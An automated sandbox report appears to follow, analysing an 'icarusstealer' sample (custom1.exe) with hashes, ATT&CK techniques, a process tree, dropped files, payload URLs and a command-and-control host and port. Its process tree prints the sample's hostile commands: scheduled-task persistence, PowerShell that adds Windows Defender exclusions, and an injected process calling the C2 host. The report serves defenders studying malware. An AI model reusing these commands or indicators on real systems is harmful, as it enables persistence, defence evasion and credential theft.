icarusstealer | 13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882

Analysis

max time kernel
150s
max time network
150s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
09/03/2024, 05:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

custom1.exe
Size

24.9MB
MD5

4e1c29f0c1af62ddea916c6b80548c76
SHA1

38d9f15356b6a65f4e76ee739867d55b01493793
SHA256

13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
SHA512

f863e54437a36b53f91057f74bdbfcaed90c93256333afe978be5f7b73b417a74084d3a92afe4b6ceea96fd909997cf22b30612c43d6d0d27c64c0bba7db9c28
SSDEEP

49152:lfRW10dDWeHzJhNF/CBpOqqUe00zCMe8KfFo:lfw1yaeHLNF/22UwCL8yF

Score

10^/10

icarusstealer persistence stealer

Malware Config

Extracted

Family

icarusstealer

Attributes

payload_url
https://blackhatsec.org/add.jpg

https://blackhatsec.org/remove.jpg

Signatures

IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
stealer icarusstealer

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Executes dropped EXE 6 IoCs

pid	Process
1716	Client.exe
3052	switched.exe
2564	pulse x loader.exe
2692	tesetey.exe
2976	YourPhone.exe
928	$SXR.exe

Loads dropped DLL 6 IoCs

pid	Process
912	custom1.exe
912	custom1.exe
3052	switched.exe
3052	switched.exe
2344	cmd.exe
1536	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
9	raw.githubusercontent.com
10	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ipinfo.io

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\System32\CatRoot\$SXR\Read.txt	Client.exe
File created	C:\Windows\System32\CatRoot\$SXR\$SXR.exe	Client.exe
File opened for modification	C:\Windows\System32\CatRoot\$SXR\$SXR.exe	Client.exe
File opened for modification	C:\Windows\System32\CatRoot\$SXR\Read.txt	$SXR.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2692 set thread context of 2092	2692	tesetey.exe	41

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2408	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1616	timeout.exe

Modifies registry class 5 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	tesetey.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	tesetey.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2692	tesetey.exe
2976	YourPhone.exe
1560	powershell.exe
1204	powershell.exe
2976	YourPhone.exe
2976	YourPhone.exe
1716	Client.exe
1716	Client.exe
1716	Client.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe
2976	YourPhone.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	2692	tesetey.exe
Token: SeShutdownPrivilege	556	explorer.exe
Token: SeShutdownPrivilege	556	explorer.exe
Token: SeShutdownPrivilege	556	explorer.exe
Token: SeShutdownPrivilege	556	explorer.exe
Token: SeShutdownPrivilege	556	explorer.exe
Token: SeDebugPrivilege	2092	cvtres.exe
Token: SeShutdownPrivilege	556	explorer.exe
Token: SeShutdownPrivilege	556	explorer.exe
Token: SeShutdownPrivilege	556	explorer.exe
Token: SeDebugPrivilege	2976	YourPhone.exe
Token: SeDebugPrivilege	1204	powershell.exe
Token: SeDebugPrivilege	1560	powershell.exe
Token: SeDebugPrivilege	1716	Client.exe
Token: SeShutdownPrivilege	556	explorer.exe
Token: SeShutdownPrivilege	556	explorer.exe
Token: SeDebugPrivilege	928	$SXR.exe
Token: SeDebugPrivilege	928	$SXR.exe
Token: SeShutdownPrivilege	556	explorer.exe
Token: SeShutdownPrivilege	556	explorer.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe

Suspicious use of SendNotifyMessage 16 IoCs

pid	Process
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe
556	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 912 wrote to memory of 1716	912	custom1.exe	28
PID 912 wrote to memory of 1716	912	custom1.exe	28
PID 912 wrote to memory of 1716	912	custom1.exe	28
PID 912 wrote to memory of 1716	912	custom1.exe	28
PID 912 wrote to memory of 3052	912	custom1.exe	29
PID 912 wrote to memory of 3052	912	custom1.exe	29
PID 912 wrote to memory of 3052	912	custom1.exe	29
PID 912 wrote to memory of 3052	912	custom1.exe	29
PID 3052 wrote to memory of 2564	3052	switched.exe	30
PID 3052 wrote to memory of 2564	3052	switched.exe	30
PID 3052 wrote to memory of 2564	3052	switched.exe	30
PID 3052 wrote to memory of 2564	3052	switched.exe	30
PID 3052 wrote to memory of 2692	3052	switched.exe	31
PID 3052 wrote to memory of 2692	3052	switched.exe	31
PID 3052 wrote to memory of 2692	3052	switched.exe	31
PID 3052 wrote to memory of 2692	3052	switched.exe	31
PID 2564 wrote to memory of 2576	2564	pulse x loader.exe	33
PID 2564 wrote to memory of 2576	2564	pulse x loader.exe	33
PID 2564 wrote to memory of 2576	2564	pulse x loader.exe	33
PID 2576 wrote to memory of 2500	2576	cmd.exe	35
PID 2576 wrote to memory of 2500	2576	cmd.exe	35
PID 2576 wrote to memory of 2500	2576	cmd.exe	35
PID 2576 wrote to memory of 2648	2576	cmd.exe	36
PID 2576 wrote to memory of 2648	2576	cmd.exe	36
PID 2576 wrote to memory of 2648	2576	cmd.exe	36
PID 2576 wrote to memory of 2752	2576	cmd.exe	37
PID 2576 wrote to memory of 2752	2576	cmd.exe	37
PID 2576 wrote to memory of 2752	2576	cmd.exe	37
PID 2692 wrote to memory of 2460	2692	tesetey.exe	38
PID 2692 wrote to memory of 2460	2692	tesetey.exe	38
PID 2692 wrote to memory of 2460	2692	tesetey.exe	38
PID 2692 wrote to memory of 2460	2692	tesetey.exe	38
PID 2460 wrote to memory of 2580	2460	csc.exe	39
PID 2460 wrote to memory of 2580	2460	csc.exe	39
PID 2460 wrote to memory of 2580	2460	csc.exe	39
PID 2460 wrote to memory of 2580	2460	csc.exe	39
PID 2692 wrote to memory of 556	2692	tesetey.exe	40
PID 2692 wrote to memory of 556	2692	tesetey.exe	40
PID 2692 wrote to memory of 556	2692	tesetey.exe	40
PID 2692 wrote to memory of 556	2692	tesetey.exe	40
PID 2692 wrote to memory of 2092	2692	tesetey.exe	41
PID 2692 wrote to memory of 2092	2692	tesetey.exe	41
PID 2692 wrote to memory of 2092	2692	tesetey.exe	41
PID 2692 wrote to memory of 2092	2692	tesetey.exe	41
PID 2692 wrote to memory of 2092	2692	tesetey.exe	41
PID 2692 wrote to memory of 2344	2692	tesetey.exe	42
PID 2692 wrote to memory of 2344	2692	tesetey.exe	42
PID 2692 wrote to memory of 2344	2692	tesetey.exe	42
PID 2692 wrote to memory of 2344	2692	tesetey.exe	42
PID 2692 wrote to memory of 2092	2692	tesetey.exe	41
PID 556 wrote to memory of 2864	556	explorer.exe	44
PID 556 wrote to memory of 2864	556	explorer.exe	44
PID 556 wrote to memory of 2864	556	explorer.exe	44
PID 2692 wrote to memory of 2092	2692	tesetey.exe	41
PID 2344 wrote to memory of 2976	2344	cmd.exe	45
PID 2344 wrote to memory of 2976	2344	cmd.exe	45
PID 2344 wrote to memory of 2976	2344	cmd.exe	45
PID 2344 wrote to memory of 2976	2344	cmd.exe	45
PID 2692 wrote to memory of 2092	2692	tesetey.exe	41
PID 2692 wrote to memory of 2092	2692	tesetey.exe	41
PID 2092 wrote to memory of 1456	2092	cvtres.exe	46
PID 2092 wrote to memory of 1456	2092	cvtres.exe	46
PID 2092 wrote to memory of 1456	2092	cvtres.exe	46
PID 2092 wrote to memory of 1456	2092	cvtres.exe	46

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\custom1.exe
"C:\Users\Admin\AppData\Local\Temp\custom1.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:912
- C:\Users\Admin\AppData\Local\Temp\Client.exe
  "C:\Users\Admin\AppData\Local\Temp\Client.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1716
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
    3⤵
    PID:2432
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
      4⤵
      Creates scheduled task(s)
      PID:2408
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp2B93.tmp.bat""
    3⤵
    - Loads dropped DLL
    PID:1536
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:1616
  - - C:\Windows\System32\CatRoot\$SXR\$SXR.exe
      "C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of AdjustPrivilegeToken
      PID:928
- C:\Users\Admin\AppData\Local\Temp\switched.exe
  "C:\Users\Admin\AppData\Local\Temp\switched.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3052
- - C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
    "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2564
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2576
    - - C:\Windows\system32\certutil.exe
        
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
        5⤵
        
        PID:2500
    - - C:\Windows\system32\find.exe
        
        find /i /v "md5"
        5⤵
        
        PID:2648
    - - C:\Windows\system32\find.exe
        
        find /i /v "certutil"
        5⤵
        
        PID:2752
- - C:\Users\Admin\AppData\Local\Temp\tesetey.exe
    "C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wrtvptk5\wrtvptk5.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2460
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1BCA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2E7432A2F41F46AB9FD13539767D44EA.TMP"
        5⤵
        
        PID:2580
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies Installed Components in the registry
      Modifies registry class
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:556
    - - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        5⤵
        
        PID:2864
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2092
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
        5⤵
        
        PID:1456
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1560
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
        5⤵
        
        PID:1576
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1204
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\YourPhone.exe & exit
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2344
    - - C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
        
        C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2976

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cab5073.tmp

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
6.1MB

MD5
30374717eeb3c4b48c389586ec59d0c4

SHA1
b0ae8e1330bb63408474f34fe12e5b59a3a4655e

SHA256
f5fec64480dd48af03c177d78d70e06f66d72eea212a23e09f0125ac9632372a

SHA512
38274ab6700c51ff2f5c91ad3da45ee066231ea84bfb81cdfb7f84f18625dca7ad7005f6e44c8235603e2f0f607b88dff0d42d501325b2b330b06343878c340b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
5.0MB

MD5
f92e69f40fd9a675301c9c699b49ab7d

SHA1
2915bbadb83f4e5f962420e8dc01d8df80af73a7

SHA256
3f10e6d4e443099cc84a1ce82c963394d9999ecc51687448ea6923d6183e12fa

SHA512
31ba38ed4c47f011c9c20f5356eb51e0cdd4a0ba89f733e2ee71efff4552948a3dc4756c198a607c7141d6c37cd0c547dcae455f454590c06e9f8896021fdac5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1BCA.tmp

Filesize
1KB

MD5
76007e7f19735c7dfff9c59738cfdaf5

SHA1
88e1ce155b7220139e4e892acb3bbcef41d09bca

SHA256
01b77e4aff034038c88716d9ddc5735c9f9747552bb5679c6850f01d44f52a72

SHA512
ee201d840ebd8e914289bd9e5038ee1ed133278792fd8d7e14bb9bbb716279fe76bc696b190b83ed2551729cf9f4f7302d7bd31776472b0e7b69180b7a4901f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\YourPhone.exe

Filesize
4KB

MD5
b9fbcd8ae1a16ba8b740b793855194b0

SHA1
6a20f4d7129c0bc2bc6587d6ea9fbfdd91279791

SHA256
93c28ed98f36d155cca6f2f1e1c09d9a3f8cc9b7431ffb0aca214cd32c3da9b3

SHA512
0eb0e9898cdb8eb12e8d3426284154feb130f7640121c59c72ae04b70fccc95b78acc5440a206e772b97de8838bbe01025c17e701feb569a99386c6043d8e6d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
2.6MB

MD5
7b806012575d8b2abcfefb9fcb3c852d

SHA1
56560ef6aa60d68ea8eccb505215533de84bff46

SHA256
c97bfebb5732f376cf6e2bf7e6f4eedb8f66be0e193b7d30fe9859f890d649fe

SHA512
aa3c85e3d4a6f0805289a1885b0674f694aa098d0c013c18a6aa4ad0661cc79a72d895cc15ba85678225c25070cbac1270048c30d49ba55a6a2e39ee911c52cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
2.4MB

MD5
f141506d2acbeeed5ca25c5134964ca3

SHA1
41eacf15501ce5488e87936b35bac488380cc8ed

SHA256
ea9e6aa4cfca6f9ed55fc5b0803a223ecba54a99cdd1a3e6a3b9da57745bcd1d

SHA512
878af9adacd0be680a4346c7ee347e7394eab46e661132489e678c01a58c97657b1655bf77cb393e037c36c2cec0177d397f63facea83d5bebaf6f8deddade8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tesetey.exe

Filesize
494KB

MD5
0f0838bc6642dd6bc603368e50b4aba3

SHA1
932bd4d1c11996bf8ac3ac74a94b266e96d44c36

SHA256
4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9

SHA512
a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2B93.tmp.bat

Filesize
150B

MD5
3512325c16882d490993552a880f48ab

SHA1
be8dae14724212ed80f257929fe30e457aa369e3

SHA256
495560b364c116ff959c367ae72e14fe0135f417b82f02b774126e00e4e530f7

SHA512
4d84ce8b1cd5bf6b18327f9a41d9ac22812db7e7535b4e213eae34ec60d1e643158e99f9c1c23025a4756630239f150649a824bca59822cc60ad84cc9a26660a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1VN6Y1G9HUY7AACBNFOT.temp

Filesize
7KB

MD5
35712472ce2d92df91b40582cc324a5c

SHA1
318373b202435b23d708180f3b31d438b5d6b9b0

SHA256
edea7b149c46c7d8372c1948d8f2736250a115b8049c43579cc8391569a91de8

SHA512
be29540c26173b15442ebe3708e0171466177d719eca28ce4bb7d5a0b627c99299ecab6df651f3fa927a714c9824c7f572905b6fa9017fc4b36fb88eef431d61

Download Submit
C:\Windows\System32\CatRoot\$SXR\$SXR.exe

Filesize
2.0MB

MD5
3b03ddc209f97547dd4dd8919f7a5894

SHA1
38f63fb9131c10b2c7ed91dc415df81099a083c3

SHA256
632ef3ce8f91fc7dfc7edc28325ab0d58e4627e7c91fd5f68a7a014abe8a7ce4

SHA512
ee6ec5d778e972e82a09d74537aede69da55490be1e5a0c45048b53eba0b1f436552125c7b6dcccde05c01457598c943d2cee3f875c52f4a933412425c177727

Download Submit
C:\Windows\System32\CatRoot\$SXR\Read.txt

Filesize
58B

MD5
79668a6729f0f219835c62c9e43b7927

SHA1
0cbbc7cc8dbd27923b18285960640f3dad96d146

SHA256
6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e

SHA512
bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3

Download Submit
C:\Windows\System32\catroot\$SXR\$SXR.exe

Filesize
1.5MB

MD5
3e4013fd2b35368f8964777924f91815

SHA1
ac265bab275e551f588eae4306107a3db9d28d6e

SHA256
d3fdac096bde20584e2ef92f65d528043dca634f30a218b3e8fe5efff029da19

SHA512
6d0f31ab254645737faf2605989818b75c6f2bdc19eab5420ff539c603a93e5b654c3f93605b9aca3977c6addc61423daa0a3ed09922134023926ad9b66543e8

Download Submit
C:\Windows\System32\catroot\$SXR\$SXR.exe

Filesize
5.7MB

MD5
1e1f2e230f4e1c7d9f9a048bbf9d7ec4

SHA1
aacda166a772faff6f45a9bf5e4dbe3813efa935

SHA256
b05118c18a35892d043697caccdef11d4ba74907986f093b78c7a66a998f2d7b

SHA512
840e0cabcb48852c1040e2c8a384cf3a997196ba8d41ad02db8f22b72e944a60c877f614742da6c233ca5413e46540f5b1ff0bc35c8fe6f75e7939392c349599

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC2E7432A2F41F46AB9FD13539767D44EA.TMP

Filesize
1KB

MD5
1d5543c367c49b9dd6366270fdd4ee3a

SHA1
bf1e4c9b270125c4fd6fba63cf9fa92c5b3b8e66

SHA256
502b03046eea75f154cee0da9adfb6ca501704b97ef7ac5053de8f0f9f92d4d2

SHA512
86c864acdf3b4b457128889d37d6aad9190c53be059f30c7975adc7966c1aaa0b695ed22599aa5f63b2e44c8f5411f861db08b20c9909f4b934c852f064efa04

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wrtvptk5\wrtvptk5.0.cs

Filesize
1KB

MD5
14846c9faaef9299a1bf17730f20e4e6

SHA1
8083da995cfaa0e8e469780e32fcff1747850eb6

SHA256
61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

SHA512
549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wrtvptk5\wrtvptk5.cmdline

Filesize
451B

MD5
2252349e29fa038a0e6bc05ad31f35b9

SHA1
1e2c924eacfc47f16520a629d5665bc9b6fcd66d

SHA256
7f650e390c9a3292f81d424361f3381eec0869c25602195406dc82ec20f60cb9

SHA512
50f4706ec687ad68d6842fc355d0776ae25c5f2b2fa2bfd78bad4f2454600911c1ceceef41e816d354e8605ebf3cdc9e92c7925c1934973443b6dcf3db72599b

Download Submit
\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
5.3MB

MD5
c4e258d20a97211d53b46822d9796075

SHA1
885d8dba7ef3e485ffbcccaa30004a75c281dced

SHA256
aae1abb245f0e59f27e80a496282673b92b1e06b8be4850699bbf8107515931a

SHA512
